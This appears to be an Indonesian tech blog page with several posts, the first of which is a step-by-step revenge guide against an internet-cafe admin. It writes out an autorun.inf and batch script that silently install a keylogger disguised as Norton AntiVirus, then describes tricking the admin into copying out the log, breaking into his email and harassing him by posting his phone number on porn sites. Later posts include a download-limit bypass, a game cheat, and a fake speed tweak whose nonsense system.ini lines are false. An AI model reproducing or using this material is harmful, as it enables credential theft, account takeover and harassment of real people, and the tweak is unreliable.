Sunday, February 27, 2011

PEMBALASAN UNTUK SANG ADMIN warnet

Assalamualaikum wr.wb

Semakin paranoidnya para admin belakangan ini menyebabkan banyak pengguan jasa layanan internet cafe (warnet) menjadi kurang nyaman.


|---[Table of Content

1. Introduction
2. Serangan pertama
3. Serangan kedua
4. Hari pembalasan
5. Cara pencegahan
6. Penutup
[+] Kesimpulan
[+] Referensi


1. Introduction

Semakin paranoidnya para admin belakangan ini menyebabkan banyak pengguan jasa layanan internet cafe (warnet) menjadi kurang nyaman. Restriction (pembatasan) disana-sini (walaupun semua itu dilakukan bukan tanpa alasan) menjadi salah satu inspirasi bagi banyak orang untuk mencari-cari cara menerobos segala keterbatasan itu dan saling men-share pengetahuan mereka. Berbagai jenis exploit pun dibedah, didiskusikan dan dikemas menjadi artikel untuk para newbie.
Sejenak para newbie bisa tertawa puas, berjaya, senyum-senyum sendiri sampai tak jarang lupa diri Namun semua itu tentunya tidak bertahan lama. Admin menjadi semakn pintar. Fasilitas Floppy drive dan CD room drive dihapus dan melarang user untuk melakukan segala bentuk transfer file dari media penyimpanan sementara (disket, cd, flashdisk) kecuali melalui server terlebih dahulu. Ini merupakan fenomena yang akhir-akhir ini bisa kita temui dengan mudah di berbagai Internet cafe. Admin mulai rajin mengupdate path sehingga exploit-exploit yang dulu dibangga-banggakan oleh kaum newbie menjadi "rongsokan" tak berguna.
Sekarang, mari kita bangunkan sang admin dari mimpi indahnya untuk menunjukkan bahwa menjadi paranoid itu adakalanya tidak baik dan tidak ada system yang 100% secure.


2. Serangan pertama

Kita akan menjadi seorang "agen mata-mata" (hehehe.. gw pake istilah ini biar ente merasa agak sedikit keren) yang akan merekam segala aktivitas sang admin. Tujuannya.. banyak! dan salah satunya seperti hal yang banyak diinginkan orang.. mendapatkan password sang admin. Partner kita kali ini adalah navw32.exe, sebuah keyloger dengan icon Norton AntiVirus yang bisa kamu dapatkan suka-suka dengan harga cuma-cuma di halaman member kategori Keyloger. Setelah kamu download keyloger tersebut, ikuti langkah-langkah berikut:

---[1 Bukalah Notepad kemudian ketik satu baris script berikut:
open=nav.bat
Klik [file][save] kemudian pada box save as type, pilih All Files dan pada form isian name beri nama Autorun.inf lalu klik tombol [save].

---[2 Buka lembar baru pada notepad dengan klik menu [file][new] lalu ketik script berikut:
@echo off
echo Norton Antivirus 2006
echo Scanning disk drive...
echo Please wait...
copy navw32.exe %windir%\navw32.exe
call %windir%\navw32.exe
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo. Scanning complette! No virus threat detected!
echo.
cls
Klik [file][save] kemudian pada box save as type, pilih All Files dan pada form isian name beri nama nav.bat lalu klik tombol [save].

---[3. Persiapkan beberapa file microsoft word documents (bisa diganti dengan file lain) sebagai tipuan/alasan untuk di transfer. Semakin banyak file, semakin baik karena file keyloger kamu akan semakin tersamarkan.

---[4. Persiapkan sebuah cd kosong (bekas juga boleh) lalu bakar semua file diatas (autorun.inf, nav.bat, navw32.exe dan file-file tipuan) kedalam CD.

Sekarang pergilah ke warnet tempat sang admin berkuasa. Bersikaplah seperti biasa dan jangan gugup selayaknya para koruptor yang sering nampang di satasion-stasion TV tanpa rasa malu. Setelah kamu login ke billing komputer user, datangi sang admin. Katakan pada beliau, "Mas/mbak/om/tante/, mau transfer file dari cd ini. Nama filenya blablabla tolong dikirim ke komputer nomor blablabla."
Begitu CD dimasukkan, saat itulah terjadi sebuah fenomena berikut:
Komputer akan memproses file autorun.inf secara otomatis ---> file autorun.inf akan memproses file nav.bat ---> file nav.bat akan menduplikasi file navw32.exe ke dalam directory windows dan mengaktivkannya ---> Keyloger telah terinstall, hasil rekamannya akan tersimpan di directory yang sama dengan nama navw32.dll beratribut hidden.
Sekarang, kamu bisa pulang dengan wajah tanpa dosa dan mungkin (lagi-lagi) kamu bakalan senyum-senyum sendiri sambil mengelus-elus jenggot kayak habis menang togel.
Lalu bagaimana cara mengambil file hasil rekaman keyloger di directory windows sang admin? Ikuti langkah-langkah pada serangan kedua.


3. Serangan kedua

Dua hari Kemudian, datanglah ke warnet itu lagi. Bertingkah lakulah secara wajar dan beraktivitas seperti layaknya user biasa. Setelah selesai berinternet ria, datangi sang admin, bayarlah biaya browsing seperti biasa lalu dengan wajah sangat-sangat memelas seperti pengemis di jalanan katakan pada beliau,"Mas/mbak/om/tante/, komputer saya bermasalah neeh. Mnurut pesan Error yang muncul, file navw32.dll yang berada di directory windows hilang. File tersebut beratribut hidden. Tolong doong copykan dari komputer ini. Kebetulan versi windowsnya sama dengan komputer saya.."
Tentu saja biasanya sang admin dengan sangat senang hati akan membantu kamu. Dengan suka rela dan penuh kesadaran beliau akan mengaktifkan opsi Show All files pada Folder Options dan mengcopy-kan file navw32.dll dari directory windows tanpa menyadari bahwa file tersebut bukan file system, namun file hasil rekaman keyloger.
Berikan disket/cd/flashdisk mu dan setelah file tersebut tersimpan, ucapkan beribu terima kasih lalu pulanglah ke rumah. Buka file tersebut di rumah. Klik 2x pada file lalu ketika muncul kotak dialog open with, klik opsi select program from a list dan pilih notepad pada daftar program yang ditampilkan.
Sekarang tentunya kamu bisa leluasa membaca rekaman aktivitas sang admin. Cari password emailnya dan kamu bisa menuju pada hari pembalasan.


4. Hari Pembalasan

Pilih hari yang tepat, misalnya malam jum'at kliwon dimana sang admin mungkin sedang terlelap di rumahnya. Nyalakan komputermu dan connectlah ke Internet. Namun ada baiknya kamu lakukan hal ini di warnet agar lebih aman. Carilah warnet yang buka 24 jam.
Berbekal hasil rekaman keyloger tadi, loginlah ke account email sang admin. Setelah puas menjelajahi emailnya, subscriblah ke berbagai mailing list besar dengan email tersebut. Subscribe sebanyak-banyaknya.
Ada ide yang sedikit lebih sadis (ini cuma ide lho.. sebaiknya jangan dilakukan deech..). Daftarkan emailnya ke berbagai situs-situs porno dan postinglah sebuah pesan singkat, memikat dan "mematikan". Berikut contohnya jika milis tersebut berbahasa Indonesia:

Dear all..
gwe lagi nafsu berat neeh, burun telepon gwe doong sekarang juga!! neeh no telp gwe: 021-blablabla (masukkan no telp sang admin)
gwe tunggu 24 jam lho!!

Atau jika berbahasa Inggris:

Dear,
Wanna play "freestyle" with mw? Please call me : 062-021-blablabla
You may F**k me for free!!

Atau terserah kamu laah.. saya rasa kamu lebih pintar dalam memilih kata-kata yang yahuud!!
Maka bisa dipastikan malam itu akan menjadi malam jumat kliwon paling mengerikan bagi sang admin, lebih mengerikan daripada film-film horor manapun! Telepon rumahnya akan berdering tanpa henti dibanjiri oleh telepon dari dalam dan luar negeri dengan maksud pembicaraan yang sudah bisa ditebak apa maksudnya
Keesokan harinya, setelah menghadapi malam paling mengerikan itu, sang admin akan kaget 1/2 hidup 1/2 mati mendapati inboxnya penuh dengan email-email dari berbagai milis yang beliau sendiri tidak merasa pernah bergabung dengan milis-milis itu. Dan bisa jadi, saat beliau sedang sibuk Unscribe dari milis-milis tersebut, telepon rumahnya masih terus-terusan menjerit-jerit dengan jeritan indah


5. Pencegahan

Jika kamu adalah admin yang tidak mau mengalami nasib seperti diatas, maka setiap kamu menerima CD dari siapapun selalu tekan-tahan tombol shift sambil memasukkan CD kedalam CD Room dRive. Setelah CD masuk, tetap tekan tombol shift sampai kira-kira 25 detik. Setelah itu kamu bisa melepas tombol shift dan mengaksesnya melalui windows Explorer. Klik pada area folder tree sebelah kiri, jangan pada daftar drive sebelah kanan karena fitur autorun akan aktif.


6. Penutup

---[+ Kesimpulan
Bisa kita bayangkan sendiri betapa kelalaian sepele bisa menimbulkan dampak yang sangat berbahaya. Ini hanya merupakan contoh Social Engineering sederhana namun berdampak luar biasa, untuk memancing ide kreatif anda.

---[+ Referensi
Self implementing

Note:
Sebelum anda menerapkan ide-ide diatas, saya mohon dengan sangat agar anda brfikir jernih dan mengunakan akal sehat anda. Kalau misalnya sang admin telah menolak cinta anda, jangan lantas seenaknya melakukan pembalasan dengan cara diatas. Ada baiknya anda pergi ke market terdekat untuk membeli seribu cermin. Berkacalah!! perbaiki penampilan dan perilaku anda!
Tapi kalau sang admin adalah orang-orang sombong dan telah melakukan kecurangan, menganggap rendah anda dan mengklaim diri mereka adalah super-Hacker, maka anda bisa membungkam mulut besar mereka dengan cara ini.
Readmore »

Description: PEMBALASAN UNTUK SANG ADMIN warnet Rating: 5 Reviewer: Rizal Romadhoni Hidayatullah ItemReviewed: PEMBALASAN UNTUK SANG ADMIN warnet

Cara Download Premium & Kencang Dari 4Shared

Assalamualaikum wr.wb.

Cara download premium & kencang dari 4shared....? mungkin itu yang pertama kali terlintas dipikiran kita ketika kita akan mendownload sebuah file berukuran raksaksa melalui 4shared. Oleh karena itulah sporakomputer membuat artikel yang berjudul Cara Download Premium & Kencang Dari 4Shared ini. 


Artikel ini sporakomputer dapatkan dari sebuah forum IT yang sangat membantu sekali bagi sporakomputer dibandingkan dengan situs forum lainnya di Indonesia. Forum tersebut beralamat di indoforum.org. Berikut adalah teks asli dari indoforum.org tersebut.

Caranya sbb :

1. Silahkan cari apa yg ingin kalian download dari 4shared. Misal gw mau download program sony sound forge.


2. Di page downlaod sony sound forge, klik kanan, lalu pilih View Page Source. Atau kalo mau cepat tekan tombol Ctrl U.





3. Lalu kita akan masuk ke page source nya. Tekan tombol Ctrl F, lalu ketik tsid

Biasanya akan muncul 2 hasil pencarian, kita pakai yg pertama aja.



Perhatikan gambar diatas, yg gw lingkari merah itu adalah bentuk link downloadnya,
Code:
http://dc93.4shared.com/download/23448416/7ee36f04/Sony_Sound_Forge_Pro_90e_Full.rar?tsid=20100601-232238-8cdc1404
sedangkan yg gw garis bawahi hijau adalah code tsid yg akan kita ubah .



4. Lalu kemudian ada sebuah code dari negeri antah berantah , yg juga merupakan kunci dari trik ini :
Code:
dsid=JXIOISIMJEHWIFIBJXJJILIUKNIRJGJAHHHNICJOJPIRJOITKUIOIYIVILJEIAICHWHZGBJDKTIU


5. Copas code dari negeri antah berantah itu, menggantikan code tsid pada link download.

Jadi yg tadinya link download nya seperti ini :
Code:
http://dc93.4shared.com/download/23448416/7ee36f04/Sony_Sound_Forge_Pro_90e_Full.rar?tsid=20100601-232238-8cdc1404
menjadi

Code:
http://dc93.4shared.com/download/23448416/7ee36f04/Sony_Sound_Forge_Pro_90e_Full.rar?dsid=JXIOISIMJEHWIFIBJXJJILIUKNIRJGJAHHHNICJOJPIRJOITKUIOIYIVILJEIAICHWHZGBJDKTIU


6. Kemudian kita tinggal meng-copy nya ke download manager / IDM

dan siap untuk di download...




Liat... download nya layaknya kita menjadi member premium, kenceng dan bisa di resume


:: Jadi kesimpulannya, gunakan code dari negeri antah berantah itu kalo kita mau download dari 4Shared



OK segitu aja dulu...


Komen dan pertanyaan dipersilahkan...
Readmore »

Description: Cara Download Premium & Kencang Dari 4Shared Rating: 5 Reviewer: Rizal Romadhoni Hidayatullah ItemReviewed: Cara Download Premium & Kencang Dari 4Shared

Mau tau bagian yg dihidden dari setiap web ??

Assalamualikum wr.wb.

Mau tahu apa yang tersembunyi di dalam suatu web favorit Anda. Gampang sekali kok caranya...! tinggal tambahkan robots.txt di bagian belakang alamat website tersebut....!


Contohnya adalah seperti berikut ini :



Code:
http://www.facebook.com/robots.txt

atau

http://www.microsoft.com/robots.txt

atau

http://www.amazon.com/robots.txt

atau

http://www.amazon.com/robots.txt

dsb...
sekedar info aja... iseng2x berhadiah

yg mau nambahin dipersilahkeun...
Readmore »

Description: Mau tau bagian yg dihidden dari setiap web ?? Rating: 5 Reviewer: Rizal Romadhoni Hidayatullah ItemReviewed: Mau tau bagian yg dihidden dari setiap web ??

Cheat Pb 30.10.10 WS + ALT TAB + Misi Major With Reset Card

Assalamualaikum wr.wb.

Bagi para penggila game PB, kali ini sporakomputer memberikan sebuah cheat pb 30.10.10 WS. Fungsi dari cheat ini sangat beragam untuk lebih jelasnya langsung simak baik-baik artikel sporakomputer berikut.

Nama File : ™WhItE_V.1.7™

Creadit : ( Sapta Agunk )

FITUR :
© Alt + Tab
© Wall Shoot
© Bomberman
© Buy MisionCard
© Hack Title
© Reset Mision
© Hack Mision

TUTORNYA:
///////////////////////////////////////////////////////////////////////////

///////////////////////////////////////////////////////////////////////////

Alt + Tab : F1 ON (Tekan sampai bunyi "ding" n langsung ke dekstop)
F2 OFF (Tekan setelah kembali ke PB sampai bunyi ding )

WallShoot : F3 ON (Tekan sampai bunyi "ding" n langsung start room)
F4 OFF (Tekan setelah 5 detik dari start room )

Bomberman : F5 ON (Tekan di dlm match) << hati2 bisa BT
F6 OFF (Tekan setelah 3x lemparan bomb / jangan terlalu lama)

Nb : Tekan hotkey berkali2 dan perlahan2 sampai bunyi
bisa BT kalau asal2 dalam menekan << perhatikan

///////////////////////////////////////////////////////////////////////////

///////////////////////////////////////////////////////////////////////////

Buy MisionCard : F12
Hack Title : F11
Reset Mision : Numlock (.)
Hack Mision : Numlock 1 s/d 0

///////////////////////////////////////////////////////////////////////////

///////////////////////////////////////////////////////////////////////////

Download 122802...V.1.7.rar

Special Thanks to :
© SwaddeDyan @ Admin n VB
© Kirara Ukira @ Src Bomberman nya
© BgToy @ dll.masmed nya
© Rifqi36
© All Members @ Suport
© *****.SWT


scan virus totalnya :

Antivirus Version Last Update Result
AhnLab-V3 2010.10.28.00 2010.10.27 -
AntiVir 7.10.13.66 2010.10.28 -
Antiy-AVL 2.0.3.7 2010.10.28 -
Authentium 5.2.0.5 2010.10.28 -
Avast 4.8.1351.0 2010.10.27 -
Avast5 5.0.594.0 2010.10.27 -
AVG 9.0.0.851 2010.10.28 -
BitDefender 7.2 2010.10.28 -
CAT-QuickHeal 11.00 2010.10.26 -
ClamAV 0.96.2.0-git 2010.10.28 -
Comodo 6540 2010.10.28 -
DrWeb 5.0.2.03300 2010.10.28 -
eSafe 7.0.17.0 2010.10.28 -
eTrust-Vet 36.1.7940 2010.10.28 -
F-Prot 4.6.2.117 2010.10.28 -
F-Secure 9.0.16160.0 2010.10.28 -
Fortinet 4.2.249.0 2010.10.28 -
GData 21 2010.10.28 -
Ikarus T3.1.1.90.0 2010.10.28 not-a-virus:AdWare.Win32.VB
Jiangmin 13.0.900 2010.10.28 -
K7AntiVirus 9.67.2856 2010.10.28 -
McAfee 5.400.0.1158 2010.10.28 -
McAfee-GW-Edition 2010.1C 2010.10.28 -
Microsoft 1.6301 2010.10.28 -
NOD32 5572 2010.10.28 -
Norman 6.06.10 2010.10.28 -
nProtect 2010-10-28.01 2010.10.28 -
Panda 10.0.2.7 2010.10.28 -
PCTools 7.0.3.5 2010.10.28 -
Prevx 3.0 2010.10.28 -
Rising 22.71.02.04 2010.10.28 -
Sophos 4.59.0 2010.10.28 Sus/VB-AG
Sunbelt 7158 2010.10.28 -
SUPERAntiSpyware 4.40.0.1006 2010.10.28 -
Symantec 20101.2.0.161 2010.10.28 -
TheHacker 6.7.0.1.069 2010.10.27 -
TrendMicro 9.120.0.1004 2010.10.28 -
TrendMicro-HouseCall 9.120.0.1004 2010.10.28 -
VBA32 3.12.14.1 2010.10.28 -
ViRobot 2010.10.25.4110 2010.10.28 -
VirusBuster 12.70.10.0 2010.10.28 -
Readmore »

Description: Cheat Pb 30.10.10 WS + ALT TAB + Misi Major With Reset Card Rating: 5 Reviewer: Rizal Romadhoni Hidayatullah ItemReviewed: Cheat Pb 30.10.10 WS + ALT TAB + Misi Major With Reset Card

Thursday, February 24, 2011

Cara Bikin Software Folder Lock Sendiri

Assalamualaikum wr.wb.

Aplikasi atau software Folder Lock atau Pengunci Folder banyak tersedia di internet, baik yg bayar ataupun yang gratis. Kali ini kita akan mengunci folder dengan membuat Folder Lock tanpa menggunakan software.

Buka Aplikasi NotePad yang ada diwindows, Ketik atau Copy Paste Text atau Script berikut kedalam NotePAd:



@ECHO OFF
if EXIST “MyFilesLocked” goto UNLOCK
if NOT EXIST MyFiles goto MDMYFILES
echo Mau Kunci Folder MyFiles ??(Y/N)
set /p “pilihan=>”
if %pilihan%==y goto LOCK
if not %pilihan%==y goto END
:LOCK
ren “MyFiles” MyFilesLocked
attrib +h +s “MyFilesLocked”
cacls “MyFilesLocked” /p everyone:n /e
cls
echo Folder MyFiles sudah terkunci…
pause
goto End
:UNLOCK
echo Mau Buka Folder MyFiles, Masukan Password lalu tekan Enter…
set/p “pass=>”
if NOT %pass%== cherry07 goto FAIL
cacls “MyFilesLocked” /p everyone:f /e
attrib -h -s “MyFilesLocked”
ren “MyFilesLocked” MyFiles
cls
echo Folder MyFiles Sudah terbuka…
pause
goto End
:FAIL
echo Password Salah !!!
pause
goto end
:MDMYFILES
md MyFiles
echo Folder MyFiles sudah dibuat
pause
:END
end

Lalu Klik File Pilih Save As Trus ketik File Name nya misal Kunci.bat dan Save As Type nya Pilih All Files.

Jalankan(dobel klik) File Kunci.bat yang telah dibuat, maka otomatis akan terbuat folder bernama “MyFiles”. Didalam folder MyFiles inilah tempat anda menyimpan data-data anda.

Selanjutnya untuk mengunci dan menyembunyikan Folder “MyFiles” Jalankan lagi File Kunci.bat dan akan keluar bacaan : “Mau Kunci Folder MyFiles ??(Y/N)” ketik y untuk mengunci atau n untuk membatalkan lalu tekan enter. Maka folder “MyFiles” sudah tersembunyi dan terkunci (tidak bisa dihapus, rename ataupun dicopy)

Jika Folder sudah terkunci dan ingin membuka kembali Jalankan lagi File Kunci.bat dan akan keluar bacaan: “Mau Buka Folder MyFiles, Masukan Password lalu tekan Enter…” ketik password anda dan tekan enter.

Contoh tersebut diatas adalah membuat Folder dengan nama MyFiles dan Passwordnya adalah cherry07, anda bisa mengganti script diatas sesuai dengan Password yang anda inginkan.

Trik Kunci Folder ini (supaya tidak bisa dihapus, rename ataupun dicopy) hanya berlaku di Windows 2000 dan Windows XP

Selamat Mencoba…

Readmore »

Description: Cara Bikin Software Folder Lock Sendiri Rating: 5 Reviewer: Rizal Romadhoni Hidayatullah ItemReviewed: Cara Bikin Software Folder Lock Sendiri

Cara Mudah Ngeliat CD Key Windows XP

Assalamualaikum wr.wb.

Punya CD Instalasi Windows XP tapi CD Key nya hilang atau lupa ?? ga usah takut, ga perlu repot... Tinggal liat aja didalam CD Windows XP nya
Caranya sbb :

1. Masukkan CD instalasi Windows XP ke dalam CD Room, biarkan loading beberapa saat...
2. Lalu buka isinya, cari & masuk ke folder I386
3. Cari file bernama UNATTEND.txt
4. Buka file tersebut dengan menggunakan notepad, dan liat pd bagian paling bawah, kita akan menemukan tulisan ProductKey = "xxxxx-xxxxx-xxxxx-xxxxx-xxxxx"
 
Readmore »

Description: Cara Mudah Ngeliat CD Key Windows XP Rating: 5 Reviewer: Rizal Romadhoni Hidayatullah ItemReviewed: Cara Mudah Ngeliat CD Key Windows XP

Cara Mudah Meningkatkan Kecepatan Buffering Youtube, Metacafe

Assalamualaikum wr.wb.

Bagi para penggila youtube kali ini ada artikel yang sangat bermanfaat bagi kalian. Cara mudah meningkatkna kecepatan buffering youtube, metacafe...??? mungkin inilah artikel yang sangat dicari-cari oleh para penggila youtube...? khususnya bagi sporakomputer sendiri. Langsung saja berikut adalah langkah2 yang harus sobat lakukan :

  1. Klik Start menu
  2. Buka Run
  3. Ketik system.ini lalu Enter
  4. Seketika akan mencul notepad dengan tulisan script tertentu
  5. Kemudian copas script berikut ke notepad tsb, letakkan dibagian bawahnya
Code:
page buffer=1000000Tbps
load=1000000Tbps
download=1000000Tbps
save=1000000Tbps
back=1000000Tbps
search=1000000Tbps
sound=1000000Tbps
webcam=1000000Tbps
voice=1000000Tbps
faxmodemfast=1000000Tbps
update=1000000Tbps
 Save, restart komputer... 'n rasakan perbedaannya
Readmore »

Description: Cara Mudah Meningkatkan Kecepatan Buffering Youtube, Metacafe Rating: 5 Reviewer: Rizal Romadhoni Hidayatullah ItemReviewed: Cara Mudah Meningkatkan Kecepatan Buffering Youtube, Metacafe

Tips Membersihkan RAM untuk Mempercepat PC

Assalamualaikum wr.wb.

Mungkin bagi para master tips membersihkan RAM untuk mempercepaat PC merupakan hal yang biasa, jadi tips ini buat yang belum bisa aja dech he..he..

Terkadang, komputer kita bakal menjadi lambat setelah beberapa lama dipakai. Apalagi kalo kita banyak menggunakan software yang berat2 seperti Adobe Photoshop, Corel Draw, Sony Soundforge dsb.


Biasanya setelah kita pakai aplikasi tersebut, komputer kita terasa lambat. Kemungkinan itu terjadi karena masih ada bekas data yang tersimpan dalam RAM, sehingga komputer kita pun jadi lambat. Salah satu cara untuk membersihkan RAM adalah dengan merestart komputer terlebih dahulu. Tapi kayanya ribet banget ya?

Gue punya cara yang lebih simpel yang bisa dilakuin oleh semua kalangan, awam maupun mahir. Perhatikan caranya di bawah ini:

1. Klik kanan mouse di desktop, pilih New - Shortcut.

2. Ketik %windir%\system32\rundll32.exe advapi32.dll,ProcessIdleTasks pada kolom isian yang muncul.

3. Klik Next.

4. Beri nama shortcut tadi, nama yang dapat diberikan bebas sesuai keinginan kamu, atau kamu lewat aja, namanya otomatis jadi rundll32.exe.

5. Klik Finish.
Kapan aja komputer kamu terasa lambat, klik shortcut yang udah kamu buat tadi untuk membersihkan RAM. Sebetulnya prinsip kerjanya mungkin sama aja kaya RAM Booster atau aplikasi sejenisnya, tapi ga kalah ko seperti software2 lainnya.
Readmore »

Description: Tips Membersihkan RAM untuk Mempercepat PC Rating: 5 Reviewer: Rizal Romadhoni Hidayatullah ItemReviewed: Tips Membersihkan RAM untuk Mempercepat PC

Kode Tersembunyi Winamp

Assalamualaikum wr.wb.

Berikut sporakomputer akan memberikan sebuah artikel yang berjudul kode tersembunyi winamp??? untuk dapat mengetahui maksud dari judul artikel diatas lakukan langkah-langkah sebagai berikut:
1. Buka WINAMP kesayangan anda; bagi yang belum punya silakan download disini
2. Mainkan juga lagu kesayangan Anda
3. Klik tulisan WINAMP di bagian atas player
4. Ketik NUL
5. Pencet tombol Esc
6. Ketik L
7. Pencet tombol Esc
8. Ketik SOFT
9. Dan hasilnya : WINAMP Anda akan berkedip-kedip transparan seiring dengan dentuman musik
Readmore »

Description: Kode Tersembunyi Winamp Rating: 5 Reviewer: Rizal Romadhoni Hidayatullah ItemReviewed: Kode Tersembunyi Winamp

Cara Compress Gambar dari 5 mb menjadi 500 kb

Assalamualaikum wr.wb.

Berikut adalah artikel sporakomputer tentang bagaimana cara mengcompress gambar yang berukuran 5 mb menjadi 500 kb. Caranya adalah dengan menggunakan software yang bernama OptimumJPEG yang bisa sobat Download Softwarenya Disini. Software ini bersifat portable dan hanya berukuran 552 kb jadi sangat ringan. Tetapi dibalik ukurannya yang kecil  itu tersimpan fungsi yang sangat berguna bagi kita kolektor gambar-gambar. Karena sesuai dengan judul diatas software ini bisa mengompres gambar yang ukuran awalnya 5 mb menjadi 500 kb.
Readmore »

Description: Cara Compress Gambar dari 5 mb menjadi 500 kb Rating: 5 Reviewer: Rizal Romadhoni Hidayatullah ItemReviewed: Cara Compress Gambar dari 5 mb menjadi 500 kb

Pernah liat tulisan jalan sendiri di notepad ??

Assalamualaikum wr. wb.

Pernahkah kalina melihat tulisan yang jalan sendiri di notepad...????
Aneh tapi nyata itulah kata yang sporakomputer ungkapkan untuk hal ini. Tetapi setelah mencobanya sendiri sporakomputer mulai memahami yang dimaksudkan oleh artikel ini..!
Silakan mencobanya sediri kalau pingin tahu hasilnya gimana....!



Langkah-langkahnya adalah sebagai berikut :

1. Copy paste script berikut ke notepad

set wshshell = wscript.CreateObject("wscript.shell")
wshshell.run "Notepad"
wscript.sleep 2000
wshshell.AppActivate "Notepad"
WshShell.SendKeys "H"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "i"
WScript.Sleep 500
WshShell.SendKeys "."
WScript.Sleep 500
WshShell.SendKeys "."
WScript.Sleep 500
WshShell.SendKeys "."
WScript.Sleep 500
WshShell.SendKeys " "
WScript.Sleep 500
WshShell.SendKeys "p"
WScript.Sleep 500
WshShell.SendKeys "e"
WScript.Sleep 500
WshShell.SendKeys "r"
WScript.Sleep 500
WshShell.SendKeys "k"
WScript.Sleep 500
WshShell.SendKeys "e"
WScript.Sleep 500
WshShell.SendKeys "n"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "l"
WScript.Sleep 500
WshShell.SendKeys "k"
WScript.Sleep 500
WshShell.SendKeys "e"
WScript.Sleep 500
WshShell.SendKeys "u"
WScript.Sleep 500
WshShell.SendKeys "n"
WScript.Sleep 500
WshShell.SendKeys " "
WScript.Sleep 500
WshShell.SendKeys "s"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "y"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys " "
WScript.Sleep 500
WshShell.SendKeys "S"
WScript.Sleep 500
WshShell.SendKeys "P"
WScript.Sleep 500
WshShell.SendKeys "O"
WScript.Sleep 500
WshShell.SendKeys "R"
WScript.Sleep 500
WshShell.SendKeys "A"
WScript.Sleep 500
WshShell.SendKeys "K"
WScript.Sleep 500
WshShell.SendKeys "O"
WScript.Sleep 500
WshShell.SendKeys "M"
WScript.Sleep 500
WshShell.SendKeys "P"
WScript.Sleep 500
WshShell.SendKeys "U"
WScript.Sleep 500
WshShell.SendKeys "T"
WScript.Sleep 500
WshShell.SendKeys "E"
WScript.Sleep 500
WshShell.SendKeys "R"

2. Simpan dengan nama terserah tetapi harus berekstensi .VBS

3. Buka file tersebut dan lihat hasilnya

Untuk lebih praktisnya silahkan download file punya saya Disini
Readmore »

Description: Pernah liat tulisan jalan sendiri di notepad ?? Rating: 5 Reviewer: Rizal Romadhoni Hidayatullah ItemReviewed: Pernah liat tulisan jalan sendiri di notepad ??

17 Perbedaan Orang Bodoh dan Orang Pintar

Assalamualaikum wr.wb.

Berikut sporakomputer akan menjelaskan megenai 17 perbedaan yang membatasi antara orang bodoh dan orang pintar. Setelah membaca artikel 17 perbedaan orang bodoh dan orang pintar ini, sporakomputer berharap kepada para orang-orang pintar untuk tidak berbangga dengan kepintaran yang dimiliki sebaliknya mereka harus lebih melihat kebawa dan bersikab lebih bijaksana. 

Untuk orang-orang yang merasa dirinya bodoh setelah membaca artikel 17 perbedaan orang bodoh dan orang pintar ini, sporakomputer berharap agar mereka tidak berkecil hati dan malah bangga karena dibalik semua itu tersimpan sesuatu hal yang besar yang tidak dimiliki oleh orang pintar sekalipun.

1. Terlalu Banyak Ide
Orang "pintar" biasanya banyak ide, bahkan mungkin telalu banyak ide, sehingga tidak satupun yang menjadi kenyataan. Sedangkan orang "bodoh" mungkin hanya punya satu ide dan satu itulah yang menjadi pilihan usahanya

2. Miskin Keberanian untuk memulai
Orang "bodoh"biasanya lebih berani dibanding orang "pintar", kenapa ? Karena orang "bodoh"sering tidak berpikir panjang atau banyak pertimbangan. Dia nothing to lose. Sebaliknya, orang "pintar"telalu banyak pertimbangan.

3. Telalu Pandai Menganalisis
Sebagian besar orang "pintar"sangat pintar menganalisis. Setiap satu ide bisnis, dianalisis dengan sangat lengkap, mulai dari modal, untung rugi sampai break event point. Orang "bodoh"tidak pandai menganalisis, sehingga lebih cepat memulai usaha.

4. Ingin Cepat Sukses
Orang"Pintar" merasa mampu melakukan berbagai hal dengan kepintarannya termasuk mendapatkahn hasil dengan cepat. Sebaliknya, orang "bodoh" merasa dia harus melalui jalan panjang dan berliku sebelum mendapatkan hasil. Maka banyak orang "bodoh" lebih sabar, tekun, atau ulet.

5. Tidak Berani Mimpi Besar
Orang "Pintar" berlogika sehingga bermimpi sesuatu yang secara logika bisa di capai. Orang "bodoh"tidak perduli dengan logika, yang penting dia bermimpi sesuatu, sangat besar, bahkan sesuatu yang tidak mungkin dicapai menurut orang lain.

6. Bisnis Butuh Pendidikan Tinggi
Orang "Pintar"menganggap, untuk berbisnis perlu tingkat pendidikan tertentu. Orang "Bodoh" berpikir, dia pun bisa berbisnis.

7. Berpikir Negatif Sebelum Memulai
Orang "Pintar" yang hebat dalam analisis, sangat mungkin berpikir negatif tentang sebuah bisnis, karena informasi yang berhasil dikumpulkannya sangat banyak. Sedangkan orang "bodoh" tidak sempat berpikir negatif karena harus segera berbisnis.

8. Maunya Dikerjakan Sendiri
Orang "Pintar"berpikir "aku pasti bisa mengerjakan semuanya", sedangkan orang "bodoh" menganggap dirinya punya banyak keterbatasan, sehingga harus dibantu orang lain.

9. Miskin Pengetahuan Pemasaran dan Penjualan
Orang "Pintar" menganggap sudah mengetahui banyak hal, tapi seringkali melupakan penjualan. Orang "bodoh" berpikir simple, "yang penting produknya terjual".

10. Tidak Fokus
Orang "Pintar" sering menganggap remeh kata Fokus. Buat dia, melakukan banyak hal lebih mengasyikkan. Sementara orang "bodoh"tidak punya kegiatan lain kecuali fokus pada bisnisnya.

11. Tidak Peduli Konsumen
Orang "Pintar" sering terlalu pede dengan kehebatannya. Dia merasa semuanya sudah Oke berkat kepintarannya sehingga mengabaikan suara konsumen. Orang"bodoh"?. Dia tahu konsumen seringkali lebih pintar darinya.

12. Abaikan Kualitas
Orang "bodoh" kadang-kadang saja mengabaikan kualitas karena memang tidak tahu, maka
tinggal diberi tahu bahwa mengabaikan kualitas keliru. Sedangkan orang "pintar" sering mengabaikan kualitas, karena sok tahu.

13. Tidak Tuntas
Orang "Pintar" dengan mudah beralih dari satu bisnis ke bisnis yang lain karena punya banyak kemampuan dan peluang. Orang "bodoh"mau tidak mau harus menuntaskan satu bisnisnya saja.

14. Tidak Tahu Pioritas
Orang "Pintar" sering sok tahu dengan mengerjakan dan memutuskan banyak hal dalam waktu sekaligus, sehingga prioritas terabaikan. Orang "Bodoh"? Yang paling mengancam bisnisnyalah yang akan dijadikan pioritas

15. Kurang Kerja Keras dan Kerja Cerdas
